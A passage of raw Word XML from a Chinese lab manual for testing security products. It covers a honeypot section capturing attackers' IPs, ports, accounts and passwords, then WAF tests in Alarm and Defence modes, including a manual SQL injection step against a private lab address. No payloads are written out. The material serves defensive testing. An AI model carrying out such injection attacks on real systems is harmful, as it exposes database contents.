                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5060</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5061/ 5060/ 11211</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77806827" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>后如下</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>图，可以看到请求的端口、协议及详细日志等。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1428A40B"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6044F183" wp14:editId="4FF214A4">
                  <wp:extent cx="4104005" cy="1170940"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="2286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101"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1170940"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="762A07D8"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="150EC08E" wp14:editId="71FDCD6B">
                  <wp:extent cx="4104005" cy="1987550"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="1905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102"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1987550"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="457BDF1B"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30BE66CD" wp14:editId="137A93BA">
                  <wp:extent cx="4104005" cy="988695"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="190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103"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="988695"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C2AEF8B"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60820476" wp14:editId="76F1FE0D">
                  <wp:extent cx="4104005" cy="3088640"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="1016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104"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="3088640"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="56346E14"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CAC3B19" wp14:editId="36640A05">
                  <wp:extent cx="4067810" cy="1375410"/>
                  <wp:effectExtent l="0" t="0" r="21590" b="2159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105"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4067810" cy="1375410"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="346FD327" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4ABDAEAB" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C846E2B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F834A13"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>得到攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5DD3F977" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69E2A1F2"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366BBA39" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2816457D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="362" w:name="_Toc36487965"/>
      <w:bookmarkStart w:id="363" w:name="_Toc36573245"/>
      <w:bookmarkStart w:id="364" w:name="_Toc36630331"/>
      <w:r w:rsidRPr="0020259A">
        <w:t>WAF防火墙</w:t>
      </w:r>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="362"/>
      <w:bookmarkEnd w:id="363"/>
      <w:bookmarkEnd w:id="364"/>
    </w:p>
    <w:p w14:paraId="79749E87" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="365" w:name="_Toc36487966"/>
      <w:bookmarkStart w:id="366" w:name="_Toc36573246"/>
      <w:bookmarkStart w:id="367" w:name="_Toc36630332"/>
      <w:r w:rsidRPr="00536672">
        <w:t>功能介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="365"/>
      <w:bookmarkEnd w:id="366"/>
      <w:bookmarkEnd w:id="367"/>
    </w:p>
    <w:p w14:paraId="09F2A43F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:t>WAF防火墙</w:t>
      </w:r>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统主要分为两大模式：Alarm和Defence模式。 Alarm模式下，进行SQL注入攻击，也可透出数据库里的信息。同时也会触发我们的自主防御功能，再次SQL注入时，将看不到数据库的信息。Defence模式下，进行SQL注入攻击，直接会看到被我们的WAF阻止了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C93BA76" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="368" w:name="_Toc36487967"/>
      <w:bookmarkStart w:id="369" w:name="_Toc36573247"/>
      <w:bookmarkStart w:id="370" w:name="_Toc36630333"/>
      <w:r w:rsidRPr="00536672">
        <w:t>测试步骤</w:t>
      </w:r>
      <w:bookmarkStart w:id="371" w:name="_Toc10543"/>
      <w:bookmarkEnd w:id="368"/>
      <w:bookmarkEnd w:id="369"/>
      <w:bookmarkEnd w:id="370"/>
    </w:p>
    <w:p w14:paraId="0A6515D7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="372" w:name="_Toc36487968"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切换到alarm模式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="371"/>
      <w:bookmarkEnd w:id="372"/>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2FD2CBF5" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63038BD5"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1A184319" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>切换到alarm模式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="3129E9E2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44E7407C"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76A19DA6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>手工测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="290FEC28" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FFE5141"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4A7FEF66" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>WAF功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5BBDD3AF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62E374AC"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4AFFE8E3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>WAF防火墙页面，点击“防护设置”按钮，在右侧页面中主机的防护类型设置中，图标在“暗”的情况下，即为alarm模式。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="569636B6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="36E136C9" wp14:editId="78FF961B">
                  <wp:extent cx="4104005" cy="2073275"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="9525"/>
                  <wp:docPr id="541" name="图片 541" descr="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larm"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId106"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2073275"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="26AB3430" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C6ECC2C"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619B8787" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="257C51F7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10FDEFBB"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78E287B0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D614148" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="373" w:name="_Toc1936"/>
      <w:bookmarkStart w:id="374" w:name="_Toc36487969"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发起攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="373"/>
      <w:bookmarkEnd w:id="37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70B4E74E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="071224C0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>标题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E189910" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>发起攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1EB9BD39" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="671A9C23"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02E4CDD9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>手工测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6A48B2AD" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="569D00CF"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6034F285" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>WAF防火墙功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="62EC90AE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01FB994D"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2C34DB84" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Alarm模式下的攻击，在攻击检测结果</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>出看到</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>了有数据库表有关的信息。（后</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>附启动</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击工具的相关步骤演示）。目标地址为：http://192.168.1.239/shoot</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02D627CF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="002E88E4" wp14:editId="144648B4">
                  <wp:extent cx="4104005" cy="1837690"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="16510"/>
                  <wp:docPr id="542" name="图片 5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
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId107"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1837690"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CC1D3F0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2E2084C6" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="287742BF"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02486392" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="32395B3A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30926445"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7B1D685B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D6D96C3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="375" w:name="_Toc29695"/>
      <w:bookmarkStart w:id="376" w:name="_Toc36487970"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:t>拦截</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>效果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="375"/>
      <w:bookmarkEnd w:id="376"/>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06151CA3" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="503D96BF"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65CD0A68" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>拦截</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>效果</w:t>
            </w:r>
